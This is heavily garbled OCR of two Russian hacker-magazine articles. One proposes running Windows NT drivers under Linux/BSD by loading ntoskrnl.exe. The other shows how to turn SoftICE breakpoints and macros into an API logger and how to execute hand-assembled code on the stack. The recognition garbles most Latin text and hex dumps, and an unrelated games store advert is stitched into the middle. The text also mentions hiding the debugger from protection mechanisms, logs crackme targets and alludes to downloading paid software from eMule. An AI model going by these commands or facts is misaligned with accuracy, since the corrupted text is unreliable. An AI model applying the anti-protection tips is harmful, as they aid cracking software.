4.x все перемешалось, и большая часть системно-зависимых функций 
попала в піозкгпі.ехе, а сегодня от НАІ_ практически отказались. В нем 
осталось небольшое количество действительно низкоуровневых функ- 
ций, непосредственно взаимодействующих с оборудованием. В частнос- 
ти, с портами и с ОМА. Но в ядре Ыпих/ВЗО есть свои функции для ра- 
боты с ОМА, так что тащить за собой НАІ_ нам совершенно необязатель- 
но, тем более что драйвера взаимодействуют с ОМА не напрямую, а че- 
рез РІид-п-Ргау менеджер, который находится в піозкгпі.ехе. 

Таким образом, если заставить піозкгпі.ехе работать в среде чужерод- 
ного ему Ыпих'а (или ВЗЭ), мы получим возможность запускать любые 
ЫТ-драйвера без какой-либо доработки их двоичного кода. Это не толь- 
ко упрощает задачу переноса, но и снимает проблему так называемых 
«авторских прав». Интеграция с Европой идет полным ходом, Третий 
Рим (известный под логотипом ІІЗА) рвется в заснеженные леса Рос- 
сии, всюду устанавливая свои порядки и зако- 
ны. Любой обладатель лицензионной копии 
ѴѴіпсІоѵѵз вправе вызывать готовый драйвер от- 
куда угодно без каких бы то ни было разреше- 
ний и без выплаты дополнительного вознаг- 
раждения, но модифицировать двоичный код 
ему позволят едва ли. 

Но мы ведь и не собираемся ничего модифици- 
ровать! Мы берем готовый піозкгпі.ехе и... 
собственно, это все. Работы предстоит не так 
уж и много. Достаточно спроецировать его по 
адресам, указанным в заголовке РЕ-файла (а 
піозкгпі.ехе — это обычный РЕ-Файл) и разоб- 
раться с таблицей экспорта, используемой 
драйверами. Короче говоря, мы должны реали- 
зовать свой собственный РЕ-загрузчик и раз- 
местить его в загружаемый модуль ядра или в 
само ядро. Чтобы не мучиться, можно хлебнуть 
вина и содрать готовый загрузчик оттуда. Нет, 
это не спиртной напиток, это эмулятор 
ѴѴіпсІоѵѵз'а — ѴѴіпе (ѴѴіпсІоѵѵз Етиіаіог). 
Взаимодействие піозкгпі.ехе с Ыпих/ВЗО ядром 
будет происходить через переходной код, эму- 
лирующий НАІ_. Этот код мы будем должны на- 
писать сами, однако ничего сложного в этом 
нет, и объем работы предстоит минимальный, 
поскольку НАІ_ содержит немного функций, да 
и те простые, как самовар. Сложнее подружить 
Диспетчер Системных Вызовов с внешним ми- 
ром, то есть миром Ыпих/ВЗО. Основная проб- 
лема в том, что интерфейс Диспетчера ни разу 
не документирован и к тому же подвержен пос- 
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тоянным изменениям. А потом МісгозоТС вновь придумает 
новую пакость, и вся наша работа окажется бесполезной. 

Поэтому приходится хитрить и тащить за собой не только 
піозкгпі.ехе, но еще и пісііі.сііі. Некоторые могут спросить: за- 
чем? Какое отношение пібіі.біі имеет к драйверам и ядру? 

Драйвера его не вызывают, да и сам пібіі.біі представляет 
собой всего лишь набор переходников к піозкгпі.ехе. 

Дело в том, что интерфейс пібіі.біі худо-бедно документиро- 
ван и остается практически неизменным уже на протяже- 
нии многих лет, поэтому его смело можно брать за основу. 

После этого остается всего лишь связать пібІІ.бІІ с миром 
Ыпих/ВЗО, то есть написать транслятор запросов к драйве- 
рам. Это не так-то просто сделать, поскольку писать при- 
дется достаточно много, и работа отнимет не один день и 
даже не одну неделю, а с учетом отладки потребуется, как 
минимум, месяц. Но работа стоит того! 

По крайней мере, в Ыпих/ВЗО наладится нормальная ра- 
бота с ІМТРЗ и некоторыми другими драйверами ввода-вы- 
вода. С видеокартами, правда, все значительно сложнее, 
поскольку они взаимодействуют отнюдь не с Диспетчером 
ввода-вывода (который находится внутри піозкгпі.ехе), а с 
подсистемой ѵѵіп32. В ѴѴіпбоѵѵз 2000 она реализована в 
файле ѵѵіп2к.зуз. Как обстоят дела в других системах — не 
знаю, да это и не важно. Драйвер ѵѵіп2к.зуз — лишь малая 
часть того, что ему нужно для работы, и просто так пере- 
тащить в Ыпих/ВЗО его не получится. За ним неизбежно 
потянется все его окружение, и написать столько «оберток» будет 
практически нереально. Реально, конечно, но сколько это потребует 
времени и сил? Переписать видеодрайвер гораздо проще, не говоря 
уже о том, что в этом случае он будет более производителен. Кстати 
говоря, компании ЫѴЮІА и АТІ в последнее время наладили выпуск 
Ыпих/ВЗО драйверов под наиболее популярные чипсеты, так что проб- 
лема снимается сама собой. 

[готовый пример реализации] Конкретные переносы драйверов из 
мира ѴѴіпбоѵѵз в Ыпих/ВЗО мне неизвестны, однако под МЗЮОЗ, кажет- 
ся, есть что-то похожее. Речь идет о проекте Марка Руссиновича ІМТРЗ 
Іог МЗ-ЭОЗ — известного хакера и исследователя недр ЫТ. Бесплатную 
версию (ѵѵѵѵѵѵ.зузіпіегпаІз.сот/ІЛіІіііез/МНзОозРгоІеззіопаІ.ЫтІ) может 
только читать, а платную легко найти в Осле. Специальный мастер ус- 
тановки просит указать путь к системному каталогу ѴѴіпбоѵѵз и создает 
две дискеты, на которые ожесточенно записывает что-то тяжелое. 
Начнем с первой дискеты (которая, кстати говоря, обычно бывает систем- 
ной). Здесь находится только один исполняемый файл пМзрго.ехе, предс- 
тавляющий собой транслятор запросов, слинкованный с расширением за- 
щищенного режима ѴѴЭОЗХ 0.96 ЭОЗ ехіепбег от МісІіаеІ ТіррасІі. 

Файл пйз.дг — это «родной» пйз.зуз драйвер, вытащенный из системного 
каталога ѴѴіпбоѵѵз и для экономии места упакованный архиватором дгір. 
Для распаковки нам потребуется либо І_іпих, либо ркгір для ѴѴіпбоѵѵз/МЗ- 
ЭОЗ. Сравнив его с оригинальным файлом драйвера, мы не найдем ника- 
ких изменений! А піозкгпі.дг — это ядро системы (піозкгпі.ехе), точно так 
же вытащенное и упакованное. Никаких изменений в нем нет. 

На другой дискете находится пібіі.дг (о происхождении которого дога- 
даться нетрудно) и пМзсНк.ехе. Последний представляет собой пол- 
ностью переписанный вариант штатной утилиты сНкбзк.ехе. Чтобы зас- 
тавить консольное приложение заработать в МЗ-ЭОЗ, пришлось бы 



эмулировать еще множество функций, что в планы Руссиновича, оче- 
видно, не входило (тем не менее легендарный хакер Юрий Харон все-та- 
ки создал расширитель, способный запускать ѴѴіпбоѵѵз-приложения из- 
под голого ДОС'а, без обращения к ѴѴіпбоѵѵз вообще! Все умещается на 
одну дискетку — красота! Сам расширитель можно скачать с 
ѵѵѵѵ\/ѵ.доз\/ѵіп32.сот. Для некоммерческого применения он бесплатен). 
Еще на дискетах содержатся файлы с_866.дг, аиіосіік.дг, с_437.дг, 
с_1252.дг, МпІІ.дг, содержащие языковые страницы и прочую служеб- 
ную мишуру, без которой можно и обойтись. 

Суть в том, что ядро проекта ІМТРЗ Іог МЗЮОЗ составляют три файла: 
піозкгпі.ехе, пібіі.біі и пМз.зуз, которые помещаются в своеобразную скор- 
лупу файла пйзрго.ехе, переводящего процессор в защищенный режим и 
транслирующего МЗ-ООЗ-запросы в язык, понятный пйз.зуз, и наоборот. 
Как видишь, это работает. Конечно, Ыпих/ВЗО — это совсем не чистая 
МЗ-ООЗ. Ядро по-своему распределяет прерывания и другие системные 
ресурсы, поэтому при написании «скорлупы-оболочки» возникает множе- 
ство технических проблем, но все они решаемы. Пример аналогичного 
решения можно найти в другом проекте Марка Руссиновича ЫТРЗ Іог 
ѴѴіпбоѵѵз 9х. Здесь также используется «скорлупа», создающая адекват- 
ное окружение для піозкгпі.ехе и транслятор запросов, но она уже работа- 
ет совсем не в голой МЗ-ЭОЗ, с которой все и так ясно, а в агрессивной 
ѴѴіпбоѵѵз 9х, которая отличается от ЫТ ничуть не меньше, чем Ыпих/ВЗО. 

[заключение] Так что написать драйверную «скорлупу» для Ыпих/ВЗО 
вполне реально, и ничего фантастичного в этом нет. Ее достаточно соз- 
дать лишь однажды, после чего можно будет запускать различные драй- 
вера. Почему бы нам, хакерам, не скооперироваться и не заняться этим? 
Например, создать новый проект на ѵѵтѵ.зоигсеіогде.пеі, набрать группу 
и оттянуться по полной программе. Ведь это действительно ХАКЕРСТВО, 
а не тоскливый бух и склад! Ну так чего же мы ждем?! Поехали © 




виртуальная І_іпих-машина, работающая под управлением ѴѴіпбоѵѵз 



видеодрайвера для І_іпих, РгееВЗО и Зоіагіз от ЫѴЮІА 
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ЗоЙІСЕ как логтер 

Рассказ об ассемблере, 
отладчике уровня ядра и макросах 

СУЩЕСТВУЕТ МНОЖЕСТВО ПОЛЕЗНЫХ СОФТИН, ОТС- 
ЛЕЖИВАЮЩИХ ВСЯКИЕ СИСТЕМНЫЕ СОБЫТИЯ (НАП- 
РИМЕР, ШПИОНЯЩИХ ЗА АРІ-ФУНКЦИЯМИ). ЗАЧАСТУЮ 
ИХ ВОЗМОЖНОСТИ СИЛЬНО ОГРАНИЧЕНЫ, И ПОЭТОМУ 
ХАКЕРЫ ПИШУТ СВОИ УТИЛИТЫ, ПРОСИЖИВАЯ ЗА 
КОМПИЛЯТОРОМ ДОЛГИЕ ЗИМНИЕ НОЧИ. ХОЧЕШЬ 
УЗНАТЬ БОЛЕЕ КОРОТКИЙ ПУТЬ? I Крис Касперски ака мыщъх 



У меня тоже давно чесались лапы написать статью на тему логгин- 
га. Взять хотя бы тех же АРІ-шпионов. Все программы, которые я ви- 
дел, очень часто падали без всяких видимых причин или обходились 
вирусами/защитными механизмами, оставляя самые ценные АРІ- 
функции за пределами лога. К тому же, размер сгенерированных ло- 
гов просто ошеломлял. Среди миллионов бестолковых строк не бы- 
ло практически ничего интересного, а система фильтрации функций 
(даже если она и присутствовала) тупее моего хвоста. Можно было, 
конечно, пропустить лог через внешний фильтр, написанный на 
РегГе или Си, но ведь это же сколько программировать надо! Не го- 
воря уже о том, что нам может потребоваться информация, отсут- 





ствующая в логе, скажем, следу- 
ет ли за данной АРІ-функцией 
команда ТЕ5Т ЕАХ,ЕАХ или нет. 
А если мы захотим шпионить не 
только за АРІ, но и за чем-ни- 
будь совершенно другим? Нап- 
ример, перехватить протокол об- 
мена с драйвером или железом. 
ЗоШСЕ дает нам такую возмож- 
ность! Мы просто создаем услов- 
ную точку останова с хитрыми па- 
раметрами и заставляем отладчик 
вместо всплытия на экран, выво- 
дить всю информацию в лог, при- 
чем какие данные выводить и в 
каком порядке, опять-таки опреде- 
ляем мы сами. Система макросов — 
великая вещь, но далеко не все 
хакеры используют ее на полную. 
Хотим получить гибкий и конфигу- 
рабельный логгер с практически 
неограниченными возможностя- 
ми? Ну, так чего же мы ждем?! 

[легкая разминка] Прежде чем 
использовать ЗоШСЕ как логгер 
,его необходимо правильно наст- 
роить. Запускам ЗутЬоІ І_оасІег, 
лезем в Есііі -> ЗоШСЕ іпіііаіігаііоп 
зеіііпд и увеличиваем размер бу- 
фера истории (Ьізіогу Ьиііег) до 
нескольких мегабайт. Точное зна- 
чение зависит от конкретной зада- 
чи. Чем больше информации нам 
необходимо собрать за один се- 
анс, тем длиннее должен быть бу- 
фер. Поскольку буфер устроен по 
принципу кольца, то при его запол- 
нении никакого переполнения не 
происходит, просто свежие дан- 
ные затирают самые старые. Во 
вкладке Масгоз Оеііпіііоп можно 
увеличить количество одновре- 
менно используемых макросов с 
32 (по умолчанию) до 256. Но это 
уже по желанию. Для большинства 
задач лимит в 32 макроса мешать 
никому не будет. 

Теперь попробуем в качестве раз- 
минки проследить за вызовом 
функции СгеаіеРіІеА, использую- 
щейся для открытия устройств и 
файлов. Создадим условную точку 
останова следующего вида: 'Ьрх 
СгеаіеРіІеА 00 "х; 1 ". Ключевое сло- 
во 00 определяет последователь- 
ность команд отладчика, которые 
тот должен выполнить после того, 
как эта точка сработает. Команды 
разделяются точкой с запятой и 
подробнее об их синтаксисте мож- 
но прочитать в главе СопсІіііопаІ 
Вгеакроіпіз руководства пользова- 
теля по отладчику. В данном слу- 
чае здесь стоит только команда 'х', 
означающая немедленный выход 
из отладчика. 

Нажмем <СігІ-0> для возврата в 
ѴѴіпсІоѵѵз и попробуем пооткры- 
вать файлы, а когда это надоест, 
вызовем ЗутЬоІ І_оасІег и сохра- 
ним историю ЗоШСЕ в файл про- 
токола (Рііе -> Заѵе ЗоШСЕ Ьізіогу 
аз). После непродолжительного 
шуршания на диске образуется 
файл ѵѵіпісе.Іод (по умолчанию). 
Посмотрим что там? 



[наш самый первый протокол] 

Вгеак сіие іо ВРХ КЕВІ\ІЕІ_32! СгеаіеРіІеА йО "х;" (ЕТ=1 .44 зесопсіз) 

Вгеак сіие іо ВРХ КЕВІ\ІЕІ_32!СгеаіеРМеА йО "х;" (ЕТ=940.19 тіііізесопсіз) 

Вгеак сіие іо ВРХ КЕВІ\ІЕІ_32!СгеаіеРМеА йО "х;" (ЕТ=14.51 зесопсіз) 

Вгеак сіие іо ВРХ КЕВІ\ІЕІ_32!СгеаіеРіІеА йО "х;" (ЕТ=1 9.23 тіііізесопсіз) 

Вгеак сіие іо ВРХ КЕВІ\ІЕІ_32!СгеаіеРіІеА йО "х;" (ЕТ=1 3.88 тіііізесопсіз) 

Мы видим множество строк, каждая из которых описывает причину сра- 
батывания точки останова и время. Вроде бы хорошо, а по сути ничего 
хорошего. Какой файл открывался в каждой строке? Завершилась ли 
эта операция успешно или нет? В общем, наша точка останова нужда- 
ется в существенной доработке. 

Вот улучшенный вариант (внимание, ЗоШСЕ не позволяет ставить две 
точки останова на одну функцию и перед тем, как создавать новую, ста- 
рая должна быть удалена командой 'Ьс О'): 

[бряк, распечатывающий имена всех открываемых файлов] 

Ьрх СгеаіеРіІеА 00 "О езр->4 І_ 20; х; 11 

Что изменилось? Появился вывод имени файла: Ю езр->4 І_ 20', где 'О 1 — коман- 
да отображения дампа, , езр->4 | — указатель на первый аргумент функции 
СгеаіеРіІеА (что открывать), а 'І_ 20' — сколько байт выводить (конкретное значе- 
ние выбирается по вкусу). Протестируем обновленный вариант. Нажимаем <СігІ- 
0>, выходим из отладчика, запускам какую-нибудь программу, за которой хотим 
пошпионить (например, РАВ), затем вновь нажимаем <СігІЮ>, заходим в отлад- 
чик и говорим 'ЬсІ 0' для прекращения шпионажа. Выходим из ЗоШСЕ, заходим 
в ЗутЬоІ І_оасІег и сохраняем историю на диск. На этот раз мы получаем: 

[усовершенствованный протокол с именами открываемых файлов] 

Вгеак сіие іо ВРХ КЕВІ\ІЕІ_32! СгеаіеРіІеА 00 "6 езр->4 І_ 20;х;" (ЕТ=3.64 зесопсіз) 

001 0:004859Е8 43 4Р 4Е 4Р 55 54 24 00-43 4Р 4Е 49 4Е 24 00 49 С0І\І01Л$.С0І\ІІІ\І$.І 
001 0:004859Р8 6Е 74 65 72 66 61 63 65-00 40 6Р 75 73 65 00 25 піегіасе.Моизе.% 

Вгеак сіие іо ВРХ КЕВІ\ІЕІ_32! СгеаіеРіІеА 00 "сі езр->4 І_ 20;х;" (ЕТ=8.98 тіііізесопсіз) 

001 0:004859Р0 43 4Р 4Е 49 4Е 24 00 49-6Е 74 65 72 66 61 63 65 С0І\ІІІ\І$.Іпіегіасе 
001 0:00485А00 00 40 6Р 75 73 65 00 25-63 00 25 30 32 64 ЗА 25 .Моизе.%с.%02с1:% 

Вгеак сіие іо ВРХ КЕВІ\ІЕІ_32! СгеаіеРіІеА 00 "6 езр->4 І_ 20;х;" (ЕТ=1 6.93 тіііізесопсіз) 
0010:00492330 43 ЗА 5С 50 72 6Р 67 72-61 60 20 46 69 6С 65 73 СЛРгодгат Рііез 
0010:00492340 5С 46 61 72 5С 46 61 72-45 6Е 67 2Е 6С 6Е 67 00 \Раг\РагЕпд.1пд. 

Совсем другое дело! Теперь отображается имя открываемого файла и 
наш импровизированный шпион мало-помалу начинает работать. Одна- 
ко отсутствуют такие важнейшие ингредиенты, как идентификатор про- 
цесса, вызывавшего АРІ-функцию и код возврата. Но что нам стоит до- 
бавить к точке останова еще несколько строк? 

[финальная точка останова ] 

Ьрх СгеаіеРіІеА 00 ''? РЮ; 0 езр->4 І_ 20; Р ВЕТ; ? ЕАХ; х;" 

Команда '? РЮ' выводит идентификатор процесса, ’Р ВЕТ' выполняет АРІ-функ- 
цию, дожидаясь возврата, а '? ЕАХ' сообщает содержимое регистра ЕАХ, в ко- 
тором находится код возврата из АРІ-функции, и все вместе это работает так: 

[полная версия протокола] 

Вгеак сіие іо ВРХ КЕВІ\ІЕІ_32! СгеаіеРіІеА 00 "? РЮ; и езр->4 І_ 20; Р ВЕТ; ? ЕАХ; х; 11 

000001 ОС 0000000476 "?" ; РЮ 

001 0:001 21 38С 43 44 2Е 73 6Е 61 69 6С-2Е 65 78 65 00 61 5Р 65 СО.зпаіІ.ехе.а.е 

001 0:001 21 39С 2Е 65 78 65 00 00 00 00-00 00 00 00 00 00 00 00 .ехе 

00000074 0000000116 "і" ; код возврата 

Вгеак сіие іо ВРХ КЕВІ\ІЕІ_32! СгеаіеРіІеА 00 "? РЮ; и езр->4 І_ 20; Р ВЕТ; ? ЕАХ; х; 1 ' 

000001 ОС 0000000476 "?" ; РЮ 

001 0Ю012138С 64 65 60 6Р 2Е 63 72 6В-2Е 65 78 65 00 61 5Р 65 Ьето.сгк.ехе.а.е 

001 0:001 21 39С 2Е 65 78 65 00 00 00 00-00 00 00 00 00 00 00 00 .ехе 

00000074 0000000116 "і" ; код возврата 

Вгеак сіие іо ВРХ КЕВІ\ІЕІ_32! СгеаіеРіІеА 00 "? РЮ; и езр->4 І_ 20; Р ВЕТ; ? ЕАХ; х; 11 

000001 ОС 0000000476 "?" ; РЮ 

001 0:001 21 38С 64 65 60 6Р 2Е 70 72 6Р-74 65 63 74 65 64 2Е 63 бето.ргоіесіесі.с 

001 0Ю012139С 72 6В 2Е 65 78 65 00 00-00 00 00 00 00 00 00 00 гк.ехе 

00000074 0000000116 "і" ; код возврата 
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настойка размера буфера истории 



Согласитесь, что с таким отчетом можно и поработать! Мы уже достигли 
функционала стандартного АРІ-шпиона, однако при желании фильтр легко 
усложнить, добавив новые критерии отбора проб. Формат протокола отчета 
также легко обогатить новыми деталями, выводя все необходимые подроб- 
ности, которые только потребуются (например, содержимое стека вызовов). 
Конечно, этот путь не обходится без проблем. Постоянно всплывающий 
ЗоШСЕ противно мерцает и жрет производительность. Можно ли как-нибудь 
заставить его ввести протокол, не всплывая? Можно! Отладчик поддержива- 
ет специальную функцию ВРІ_ОѲ, всегда возвращающую ТПІІЕ и подавляю- 
щую всплытие отладчика. К сожалению, вместе с этим подавляется и после- 
довательность команд, следующая за 00, а значит, создание подробных от- 
четов становится невозможным, так что для наших целей такой способ не го- 
дится. Других «антивсплывающих» средств в нашем распоряжении нет. 

Еще одним источником головной боли становится мусор в протоколе. 
Полезные данные перемешиваются с прочей информацией, выводя- 
щейся на экран, и... Какая там легкость чтения! Без написания специ- 
ального форматера отчетов мы буквально утонем. Но программировать 
на РегІ'е лениво, и на помощь приходят... правильно! Макросы! Только 
на этот раз не из ЗоШСЕ, а те, что встроены в РАР. 

Нажимаем <Р4> (в РАРГе) и внимательно смотрим на наш отчет. Как вид- 
но, каждая порция отчетной информации начинается со строки "Ьгеак бие 
Іо". Вот ее-то мы и будем искать! Нажимаем <СігІ-.> для начала записи 
макросов, затем <Р7> "Ьгеак бие Іо" <ЕЫТЕВ>. Теперь <ЗПііі-стрелка впра- 
во> пока мы не выделим все лишнее до "СгеаіеРіІеА", <СгІ-ОеІ>, чтобы вы- 
резать его , <СігІ-36іііі-стрелка вправо>, чтобы перейти на "00", которое мы 
также удаляем вместе с остатком строки и т.д. и т. п. Кромсаем текст, как 
хотим. Это тяжело описывать словами, легче показать конечный резуль- 
тат. После того как макрос будет создан, достаточно будет его применить 
к протоколу заданное число раз (просто нажать назначенную ему комби- 
нацию клавиш и не отпускать), в результате чего получится следующее: 

[прилизанный протокол, из которого выброшено все ненужное] 

СгеаіеЕіІеА, РЮ:1 0С6; МАМЕ: СО.зпаіІ.ехе; ВЕТ: 74И 

СгеаіеЕіІеА, РЮ:ЮС6; ІМАМЕ: бегло. сгк.ехе; ВЕТ: 746 

СгеаіеЕіІеА, РЮ:ЮС6; МАМЕ: бегло. ргоіесіеб.сгк.ехе; ВЕТ: 746 

Вполне достойный результат для нескольких минут работы! С помощью 
макросов можно сделать все или практически все! И пускай некоторые 
презрительно ухмыльнуться, мол, этот путь непрофессионален. Глав- 
ное, что поставленная задача была выполнена в рекордно короткие сро- 
ки, а все остальное уже неважно. 

[более сложные фильтры] До сих пор мы не создали ничего слож- 
нее обычного АРІ-шпиона, которых просто тьма. Начнем с того, что 
ЗоШСЕ (особенно при использовании аппаратных точек останова типа 
'Ьрт') намного менее конфликтен, чем большинство шпионов, и легко 
работает там, где другие средства уже не справляются (особенно если 



его предварительно пропатчить с помощью пакета ІсеЕхі, который скры- 
вает отладчик от некоторых защитных механизмов). Все интересное 
только начинается! 

Давайте чуть-чуть усложним задачу. Будем шпионить не за всеми фай- 
лами, а только за теми, чье имя начинается на букву «а». Это совсем 
несложно! 

[точка останова, шпионящая за открытием файлов, начинающихся с буквы «а»] 

Ьрх СгеаіеРіІеА іі Ьуіе (*езр->4)=='а' 00 ххх 

Проблема в том, что если функции СгеаіеРіІеА передается полное имя 
файла с путем, наша точка останова уже не сработает, поскольку она 
проверяет только первый символ имени, а функции поиска подстроки в 
арсенале ЗоШСЕ, увы, нет. Как говориться, конструктивно непредус- 
мотрено. Какая жалость, но не беда! 

Будем исходить из того, что память, лежащая выше указателя сте- 
ка, как правило, свободна и может быть использована по нашему ус- 
мотрению. Что если записать туда крошечную ассемблерную прог- 
рамму и передать на нее управление? Если это получится (а это по- 
лучится, уж поверь мне) мы сможем неограниченно наращивать 
функционал отладчика, не прибегая к плагинам, которые не совсем 
документированы (точнее, совсем не документированы), довольно 
громоздки, неповоротливы и т. д. 

Для выполнения программы на стеке нам нужен исполняемый стек. 
Вплоть до настоящего времени это не представляло проблемы, и в сте- 
ке можно было выполнять любой код без каких бы то ни было ухищре- 
ний, но теперь ситуация изменилась, и на пике борьбы с вирусами и се- 
тевыми червями производители процессоров скооперировались с 
Місгозоіі и в последних версиях ѴѴіпсІоѵѵз ХР, а также ненавистной мне 
І_опд6югп. По умолчанию стек защищен от исполнения, впрочем при пер- 
вой же попытке выполнения машинного кода в его окрестностях, систе- 
ма выбрасывает диалоговое окно, предлагающее либо отключить защи- 
ту, либо сделать нехорошей программе харакири. 

Чтобы осуществить задуманное, мы должны сделать следующее: 

• поместить машинный код нашей функции выше вершины стека; 

• сохранить текущее значение регистра ЕІР и регистра флагов 
(например, в том же стеке); 

• сохранить все регистры, которые изменяет наша функция; 

• установить ЕІР на начало нашей функции; 

• тем или иным образом передать аргументы (например, через регистры); 

• выполнить функцию, возвратив результат работы, например, через ЕАХ; 

• проанализировать возвращенное значение, 
выполнив те или иные операции; 

• восстановить измененные регистры; 

• восстановить регистр ЕІР и регистр флагов; 

• продолжить нормальное выполнение программы. 

Звучит устрашающе, но ничего сложного в этом нет. Давай для начала 
попытаемся выполнить функцию ХОВ ЕАХ,ЕАХ/ВЕТ. Как перевести ее в 
машинный код? Можно, конечно, воспользоваться НІЕѴѴ'ом или даже 
РАЗМ'ом, но зачем выходить из ЗоТіІСЕ? Достаточно переместиться в 
любое свободное место памяти и дать команду 'а' (аззетЫе — то есть 
ассемблировать), только предварительно убедись, что ты находишься в 
контексте отлаживаемого приложения (его имя отображается в правом 
нижнем углу экрана), а не в ядре, иначе случится крах. 

[ассемблирование нашей функции в ЗоііІСЕ] 

:а езр-1 О 

0023:001 2В(ЮС хог еах,еах 
0023:001 2В0ЭЕ геі 
0023:001 2В0ЭР 

:сі езр-1 0 

0023:001 2В0ЭС 33 СО СЗ 00 йВ 80 ЕВ 77-88 АЕ Е8 77 ЕЕ ЕЕ ЕЕ ЕЕ 3 ѵѵ..ж... 

0023:001 2В0ЕС 31 08 43 00 Е8 59 48 00-00 00 00 СО 03 00 00 00 1.С..УН 

Теперь программа лежит на стеке, но вот как ее исполнить? Да очень 
просто! Сказать 'О езр-1 0' (перейти к адресу езр-1 0) и пусть процессор 
выкручивается как может. Правда, чтобы возвратить управление в теку- 
щее место отлаживаемой программы, необходимо предварительно сох- 
ранить регистр ЕІР, а сделать это не так-то просто. Команда ’Е (езр-1 0) 
ЕІР 1 не работает, поскольку не допускает использования выражений (а 
имя регистра — это выражение) и обламывает нас по полной зупіах 
еггог. Как быть? Кого мочить? Что делать?! 






ИСПОЛЬЗУЯ ДОПОЛНИТЕЛЬНЫЕ АКССЕСУАРЫ 




Монитор 


Наушники 


Колонки 


Шлем 


Корпус 


Ріппасіе Зузіетз 


ЗііиШе ХР1736 


Зеппііеізег ВЗ 110-8 


М-Аисііо ЗіиШорЫІе 
І_Х4 2.1 Зузіет 


і-0 йізріау Зузіетз 
і-діаззез РС 


ЗНиШе ЗВ83Ѳ5С 


ЗТисІіо 9 РІиз ВІІЗ 



* В нашем магазине 
вас ждет более 
1000 игр 
на ваш выбор 



* Постоянно 
обновляемый 
ассортимент 



* Товары от 
самых лучших 
производителей 




ѵѵшѵѵ.датерозі.ги 
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макрос, выделяющий выполненные команды голубым цветом; невыполненные 
команды помечаются серым 



А давай воспользуемся командой М (тоѵе), копирующей блоки памяти 
из одного адреса в другой. Тогда мы сможем сохранить кусочек ориги- 
нальной программы на стеке, а саму программу модифицировать по 
своему усмотрению. Мы должны будем записать РІІ8Н ЕАХ/МОѴ 
ЕАХ,ЕЗР/51ІВ ЕАХ,10П/САІ_І_ ЕАХ. Короче, нам нужна команда САН 
ЕЗР-ІМ, поскольку такой команды в лексиконе х86 процессоров нет и ни- 
когда не существовало, нам приходится ее эмулировать через матема- 
тические преобразования с любым дополнительным регистром, напри- 
мер, ЕАХ. В машинном коде это выглядит так: "50П/8ВІ1 С4Н/83Н Е8Н 
10Н/РРН ООН". 

Копируем кусок отлаживаемой программы на стек: 'М ЕІР І_ 10 ЕЗР-20', 
где 'ЕЗР-20' — адрес-приемник, лежащий выше указателя вершины сте- 
ка и не затирающий нашу машинную программу. Теперь модифицируем 
окрестности отлаживаемой программы: 'ЕО ЕІР 83С48В50; ЕО ЕІР+4 
ООРРЮЕ8'. Как видно, это тот же самый код, только набранный задом 
наперед, потому что в х86 процессорах младший байт располагается по 
меньшему адресу. 

На этом подготовительный этап можно считать законченным. Говорим Т 
(ТРАСЕ), повторяя эту команду четыре раза до входа в нашу функцию, а 
затем отдаем приказ 'Р ВЕТ' для выхода оттуда. И все!!! В регистре ЕАХ 
теперь содержится ноль! Наша функция завершила свою работу и возв- 
ратила все, что хотела! Разве это не здорово, что можно выполнять в от- 
ладчике свой собственный код, написанный с чистого листа?! 

Но вот проблема как проанализировать возвращенное значение в от- 
ладчике? Если попытаться пойти прямым путем: 'ІР (еах==0) ЭО хххх', то 
нас поимеют по всему мясокомбинату. Ну не понимает ЗоШСЕ условных 
команд, и ключевое слово ІР может встречаться только в точках остано- 
ва. Так давайте и создадим ему фиктивную точку останова, которая сра- 
батывает всегда! Что-то вроде: 

[фиктивная точка останова позволяет использовать ключевое слово ІР] 

ВРХ ЕІР ІР (ЕАХ==0) 00 ххх 

Естественно, независимо от того, сработает ли точка останова или нет, 
нам необходимо восстановить регистр ЕАХ (про флаги мы помним, но 
не сохраняем их, чтобы не загромождать код), вернуть кусок оригиналь- 
ной программы на место и удалить фиктивную точку, поскольку количе- 
ство точек останова ограниченно. Что касается регистра ЕАХ, то он мо- 
жет быть восстановлен командой РОР ЕАХ, следующей за САН ЕАХ, а 
вернуть программу на место поможет конструкция 'М ЕЗР-20 І_ 10 ЕІР-9'. 
Откуда взялось 'ЕІР-9'? Прочему не ЕІР? Так ведь в процессе выполне- 
ния «заплатки» значение ЕІР изменилось! Число «9» и есть размер на- 
шей заплатки вместе с командой РОР ЕАХ. Остается сказать «В ЕІР = 
ЕІР-9», чтобы вернуть ЕІР на место, и выполнение отлаживаемой прог- 
раммы можно смело продолжать. Если все было сделано правильно, и 
никакой защитный механизм не использовал незадействованный стек, 
то отлаживаемая программа не рухнет. 



Кстати говоря, под ѴѴіпсІоѵѵз 9х с некоторой вероятностью сбои 
все-таки будут происходить, поскольку она активно мусорит в 
стеке. Чтобы не дать ей хулиганить, регистр ЕЗР следует на 
время выполнения всех операций подтянуть наверх, а затем 
снова опустить назад. 

Естественно, необязательно каждый раз набивать машинные 
коды вручную. Занятие это утомительное, и приятным его ни- 
как не назовешь. Вот тут-то нам и пригодятся макросы! Гово- 
рим 'МАСВО МАСВСЦМАМЕ = "ххххх 1 " и заносим макрос в спи- 
сок постоянных. Это делается так: запускам ЗутЬоІ І_оасІег, за- 
ходим в Есііі -> ЗоШСЕ ІпШаІігаІіоп ЗеШпд, переходим к вклад- 
ке Масго ЭеІіпШопз, нажимаем АбсІ, даем макросу имя (пате) 
и тело (беІіпШоп). Теперь макрос будет автоматически загру- 
жаться вместе с ЗоШСЕ. Можно создать библиотеку собствен- 
ных расширенных условных точек останова, поддерживающих 
такие функции поиска подстроки в строке или сравнения строк 
по шаблонам '*' и '?'. Это действительно можно сделать, и тог- 
да мощь ЗоШСЕ многократно возрастет, кроме того, мы полу- 
чим замечательный шанс попрактиковаться с программирова- 
нием в машинных кодах! 

Кстати говоря, макросы позволяют решить и другую проблему. 
Дело в том, что ЗоШСЕ не поддерживает вложенные точки ос- 
танова, без которых нам никак не обойтись (как мы помним, 
для анализа содержимого регистра ЕАХ нам пришлось прибег- 
нуть к созданию фиктивной точки останова). Если мы попыта- 
емся написать: 'ВРХ СгеаІеРіІеА ЭО "ххх; Ьрх ЕІР 00 "ХХХХ"; 
х;"', то ничего не получится! ЗоШСЕ запутается в кавычках и от- 
кажется переваривать такую конструкцию. Но если оформить 
'Ьрх ЕІР 00 "ХХХХ 1 " в виде макроса, названного, например, 
ХѴ2, то конструкция 'ВРХ СгеаІеРіІеА ЭО "ххх; ХѴ2; х;"' будет восприня- 
та отладчиком вполне благосклонно. 

[анимэ и ЗоШСЕ] Некоторые отладчики (такие, например, как 
ОІІуОЬд) имеют одну полезную фишку, которую не имеет ЗоШСЕ. 
